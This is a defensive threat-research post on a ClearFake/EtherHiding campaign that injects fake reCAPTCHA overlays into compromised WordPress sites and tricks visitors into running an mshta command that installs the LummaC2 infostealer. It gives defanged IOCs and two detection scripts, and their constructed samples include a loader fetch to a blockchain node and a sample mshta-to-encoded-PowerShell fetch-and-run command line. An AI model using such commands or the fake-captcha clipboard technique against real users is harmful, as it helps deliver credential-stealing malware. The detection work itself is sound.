Investigating a ClearFake/ClickFix + EtherHiding campaign
Since mid-December, Atea IRT has identified and tracked a new campaign using the ClearFake and EtherHiding techniques. The campaign infects legitimate websites and ultimately delivers an information stealer.
Image: how an infected website looks to the victim.
In this post we'd like to share some of the findings from researching this new ClearFake campaign.
Summary
A threat actor is infecting legitimate WordPress sites with malicious JavaScript that renders a fake reCAPTCHA prompting the user to run a command. Running this command leads to an infostealer, LummaC2.
The JavaScript on the infected site loads a second malicious JavaScript stored in a Binance Smart Contract (BSC), fetched from data-seed-prebsc-1-s1.bnbchain.org on TCP port 8545. The JavaScript from the smart contract is responsible for generating the fake reCAPTCHA and contains the malicious command that is injected into the victim's clipboard. The script only executes if the victim is browsing the infected website from a Windows operating system.
Blocking the domain data-seed-prebsc-1-s1.bnbchain.org, or restricting outbound traffic to non-standard HTTP/HTTPS ports (here TCP 8545), will mitigate the threat.
Introduction
In mid-December, an incident was escalated to Atea IRT. EDR detected a possible information stealer execution. During the investigation it was quickly confirmed that this was something we've read about before, FakeCaptcha/ClearFake. Although it seemed similar to previous ClearFake campaigns, there were some differences.
The ClearFake and EtherHiding techniques are not new. Cybersecurity researcher Randy McEoin wrote an excellent write-up on ClearFake on Aug 6, 2023 (https://rmceoin.github.io/malware-analysis/2023/08/06/clearfake.html). Nati Tal and Oleg Zaytsev of Guardio Labs detail EtherHiding in their write-up from Oct 13, 2023 (https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16). Both were an inspiration to dig a little deeper and try to understand this infection chain.
ClearFake / EtherHiding 101
ClearFake is a social-engineering technique that tricks the user into running malicious commands themselves.
Quoting Randy McEoin on the ClearFake naming:
“I’m calling this one ClearFake until I see a previously used name for it. The name is a reference to the majority of the Javascript being used without obfuscation.” Source: https://rmceoin.github.io/malware-analysis/2023/08/06/clearfake.html
EtherHiding is a technique for hosting malicious code in a "smart contract" on a blockchain. Because every infected website fetches its payload from the contract, the threat actor can centrally update all of them by changing the contract's content. Guardio writes:
““EtherHiding” presents a novel twist on serving malicious code by utilizing Binance’s Smart Chain contracts to host parts of a malicious code chain in what is the next level of Bullet-Proof Hosting.” Source: https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16
Analysis
An overview of the infection chain leading to the LummaC2 infostealer is visualized below.
Image: the infection chain leading to the LummaC2 infostealer.
During our investigation we did not dive into the LummaC2/infostealer part of the attack chain. Our research focused on the delivery and loader stages leading up to LummaC2.
While investigating this infection chain, we found some differences from the other write-ups on ClearFake and EtherHiding campaigns. The major differences are:
- The smart contract is loaded from the Binance Smart Chain test network
- A secondary smart contract is queried to track whether the user has run the malicious command
The BSC contract containing the malicious JavaScript was created 2024-Dec-08 10:13:07 PM UTC.
Investigating the infection chain
During our investigation of the EDR alert, we were unable to identify the website that lured the user into running the malicious "mshta.exe" command. We were, however, able to pivot on the data-seed-prebsc-1-s1.bnbchain.org domain to find additional samples to research.
Image: the base64-encoded script injected into an infected page.
At the time of writing, we can reliably identify over 800 websites involved in this campaign by searching for the injected <script> element. We have not investigated how these websites were compromised to begin with. A write-up from GoDaddy points out that this could be due to brute force and phishing campaigns aimed at acquiring legitimate usernames and passwords. Source: https://www.godaddy.com/resources/news/threat-actors-push-clickfix-fake-browser-updates-using-stolen-credentials
The base64-encoded JavaScript decodes to the following:
Image: the decoded script injected into the website.
The JavaScript fetches and executes a payload from the Binance Smart Chain (BSC) blockchain. The core functionality of the script is a JSON-RPC request to a BSC test-net node, from whose response it extracts a base64-encoded string, decodes it, and executes it as JavaScript. The script begins by checking the victim's operating system using the navigator.userAgent property; the test checks whether the victim is running a Windows-based OS. If the test fails, the script terminates without executing the main payload.
The JavaScript fetched from the BSC smart contract contains the HTML, CSS and JavaScript that build the UI and logic for the blurred overlay with the fake reCAPTCHA. It also contains the malicious command to run.
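The two paragraphs above describe what the injected loader looks like: a base64-encoded script element whose decoded body gates on a Windows user agent and issues a JSON-RPC eth_call to the BSC test-net node. The following triage script is an added example written for this post, not Atea IRT's tooling or the campaign's code. It extracts <script> bodies from a saved page, decodes any long base64 blob, and reports which of the indicators documented here (the node hostname, TCP port 8545, an eth_call, the two contract addresses from the IOC section, and the user-agent gate) are present. The sample page embedded at the bottom is constructed for the example and only references those indicators; it is not the real injected script.

```python
"""Added example (not Atea IRT's tooling): triage a saved web page for the
injected ClearFake/EtherHiding loader described in the post."""
import base64
import binascii
import re

# Indicators taken from the post.
BSC_TESTNET_NODE = "data-seed-prebsc-1-s1.bnbchain.org"
BSC_TESTNET_PORT = "8545"
# Contract addresses from the post's IOC section, compared case-insensitively.
KNOWN_CONTRACTS = {
    "0x80d31d935f0ec978253a26d48b5593599b9542c7",
    "0x7d0b5a06f8c43011fb66eb90f61525a827eae0d7",
}

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
# A run of 40+ base64 characters is long enough to be worth decoding.
BASE64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_base64_blobs(script_body: str) -> list[str]:
    """Return the decoded text of every long base64 blob in a script body."""
    decoded = []
    for blob in BASE64_BLOB_RE.findall(script_body):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64 / not text: ignore
    return decoded


def indicators_in(text: str) -> set[str]:
    """Name the campaign indicators present in a (possibly decoded) script."""
    found = set()
    lower = text.lower()
    if BSC_TESTNET_NODE in lower:
        found.add("bsc-testnet-node")
    if ":" + BSC_TESTNET_PORT in lower:
        found.add("port-8545")
    if '"eth_call"' in lower or "'eth_call'" in lower:
        found.add("json-rpc-eth_call")
    for address in KNOWN_CONTRACTS:
        if address in lower:
            found.add("known-contract:" + address)
    if "navigator.useragent" in lower and "windows" in lower:
        found.add("windows-useragent-gate")
    return found


def scan_page(html: str) -> list[dict]:
    """Scan every <script> element and report the ones carrying indicators."""
    findings = []
    for index, body in enumerate(SCRIPT_RE.findall(html)):
        hits = set()
        for text in [body] + decode_base64_blobs(body):
            hits |= indicators_in(text)
        if hits:
            findings.append({"script_index": index, "indicators": sorted(hits)})
    return findings


# Constructed sample page: a benign tag plus a second <script> whose body is a
# base64 blob standing in for the injected loader. The decoded text only
# references the node, port, RPC method and contract; it executes nothing.
_FAKE_LOADER = (
    'if(!navigator.userAgent.includes("Windows")){}\n'
    'fetch("https://' + BSC_TESTNET_NODE + ':' + BSC_TESTNET_PORT + '",'
    '{method:"POST",body:JSON.stringify({jsonrpc:"2.0",method:"eth_call",'
    'params:[{to:"0x80d31D935f0EC978253A26D48B5593599B9542C7"}]})})'
)
SAMPLE_PAGE = (
    "<html><head><script>window.dataLayer = window.dataLayer || [];</script>"
    "<script>" + base64.b64encode(_FAKE_LOADER.encode()).decode() + "</script>"
    "</head><body>Hello</body></html>"
)

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
```

Run it against a page saved with curl or from the browser's "view source"; any script reporting bsc-testnet-node together with json-rpc-eth_call is worth pulling for full analysis, and the known-contract hit ties it to this specific campaign.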
Image: JavaScript functions in the script.
Image: the secondary BSC contract being called.
Image: the 'commandToRun' injected into the victim's clipboard.
The screenshots above are snippets of the code. IOCs and other artifacts found are listed at the end of this post.
isGoalReached and phish completion check – indication of the campaign volume
The function isGoalReached() is an interesting one. It runs every second, calling the secondary BSC contract address and checking whether the contract contains the UUID generated for this visit. This is how the script learns that the victim has run the malicious command. Once the UUID is found, the fake reCAPTCHA is removed and the website is displayed as normal.
We believe the threat actor's infrastructure updates the BSC contract with the victim's UUID when the malicious mshta.exe command is run. All contract interactions are logged and can be viewed with a blockchain explorer (https://testnet.bscscan.com).
Image: incoming transactions to the BSC contract at the time of writing.
Checking the incoming transactions for this contract gives an indication of the volume of this campaign.
Executing the malicious mshta command spawns a base64-encoded PowerShell script.
Note: during our research, we observed that the PowerShell command executed from the mshta process is actively adjusted by the threat actor.
The following screenshots are from the most recently identified loader stage.
Image: the base64-encoded PowerShell.
Image: the decoded PowerShell.
Early in the investigation, the PowerShell executed via the mshta process was flagged as Emmenhtal by AnyRun (https://app.any.run/tasks/5378345d-ce3d-47ae-9936-e0657a380cba). The Emmenhtal classification was seen up until Jan-02-2025. Even though the loader has changed, the result is still a LummaC2 infection.
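The loader stage described above (mshta.exe fetching a remote ".captcha" URL, then spawning PowerShell with a base64-encoded command) is a good fit for process-creation telemetry. The script below is an added detection example written for this post, not Atea IRT's detection content. It applies two rules to a constructed, pipe-delimited process log (timestamp|parent image|image|command line; the record format is an assumption, not a real EDR schema): mshta.exe launched with an http(s) URL, with the ".captcha" path and the IOC hosts from the end of this post as extra signals, and powershell.exe parented by mshta.exe carrying an -EncodedCommand argument, which it decodes (UTF-16LE) for the analyst. The encoded payload in the sample is a harmless Write-Host standing in for the real loader.

```python
"""Added example (not Atea IRT's detection content): flag the mshta.exe ->
PowerShell chain described in the post in process-creation telemetry."""
import base64
import binascii
import re
from typing import List, Optional

# Hostnames from the post's IOC list (defanged there as hxxps[://]...).
IOC_HOSTS = {
    "solve.fizq.net", "solve.gevaq.com", "inej.jenj.net",
    "solve.jrqr.org", "check.qlkwr.com", "solve.bogx.org",
}
URL_RE = re.compile(r"https?://([^/\s\"']+)(/[^\s\"']*)?", re.I)
# "-<flag> <16+ base64 chars>"; the flag is checked separately because
# PowerShell accepts abbreviated prefixes of -EncodedCommand (-e, -ec, -enc, ...).
FLAG_RE = re.compile(r"(?:^|\s)-([A-Za-z]+)\s+([A-Za-z0-9+/=]{16,})")


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Decode the -EncodedCommand payload (base64 of UTF-16LE) if present."""
    for flag, blob in FLAG_RE.findall(command_line):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # e.g. -ExecutionPolicy is not an encoded-command flag
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def analyse(record: str) -> List[str]:
    """Return the alert names raised by one process-creation record."""
    _timestamp, parent, image, cmd = record.split("|", 3)
    image_l, parent_l = image.lower(), parent.lower()
    alerts = []
    if image_l.endswith("mshta.exe"):
        match = URL_RE.search(cmd)
        if match:  # mshta executing remote content, as in this campaign
            host = match.group(1).lower()
            path = (match.group(2) or "").lower()
            alerts.append("mshta-remote-url")
            if host in IOC_HOSTS:
                alerts.append("mshta-ioc-host")
            if path.endswith(".captcha"):
                alerts.append("mshta-captcha-path")
    if image_l.endswith("powershell.exe") and parent_l.endswith("mshta.exe"):
        alerts.append("powershell-from-mshta")
        decoded = extract_encoded_command(cmd)
        if decoded is not None:
            alerts.append("encoded-command:" + decoded)
    return alerts


# Constructed sample log. The host is a placeholder, not one of the IOCs, and
# the encoded script is a harmless Write-Host standing in for the real loader.
_SAMPLE_SCRIPT = "Write-Host 'constructed sample'"
_SAMPLE_B64 = base64.b64encode(_SAMPLE_SCRIPT.encode("utf-16le")).decode()
SAMPLE_LOG = [
    "2024-12-15T10:00:01Z|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\mshta.exe"
    "|mshta https://solve.example.invalid/awjxs.captcha",
    "2024-12-15T10:00:02Z|C:\\Windows\\System32\\mshta.exe"
    "|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|powershell -w hidden -ep bypass -enc " + _SAMPLE_B64,
    "2024-12-15T10:05:00Z|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\mshta.exe"
    "|mshta C:\\Tools\\local.hta",
    "2024-12-15T10:06:00Z|C:\\Windows\\explorer.exe"
    "|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|powershell -Command Get-Date",
]

if __name__ == "__main__":
    for record in SAMPLE_LOG:
        print(record.split("|", 3)[0], analyse(record))
```

The parent/child rule is the durable one: the mshta URL and the decoded PowerShell both changed during this campaign, but mshta.exe spawning PowerShell with an encoded command is rare in normal operation and survives the actor's loader updates.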
Wrap-up
This campaign was first seen in early December and is continuing to spread. Using a drive-by-style attack, it delivers a malicious payload through the execution of malicious JavaScript injected into legitimate, compromised WordPress websites.
We are currently tracking and updating a list of domains used for the malicious command here: https://raw.githubusercontent.com/ttakvam/ThreatResearch/refs/heads/main/ClearFake-Dec-2024/IOCs/extracted_urls.txt
Updated IOCs will be published here: https://github.com/ttakvam/ThreatResearch/tree/main/ClearFake-Dec-2024
IOCs
Binance Smart Chain contracts/addresses
- 0x80d31D935f0EC978253A26D48B5593599B9542C7
- 0x7d0b5A06F8c43011fB66Eb90f61525A827eaE0d7
Mshta URLs
- hxxps[://]solve.fizq.net/awjxs.captcha
- hxxps[://]solve.gevaq.com/awjxs.captcha
- hxxps[://]inej.jenj.net/awjxs.captcha
- hxxps[://]solve.jrqr.org/awjxs.captcha
- hxxps[://]check.qlkwr.com/awjsx.captcha
- hxxps[://]solve.bogx.org/awjsx.captcha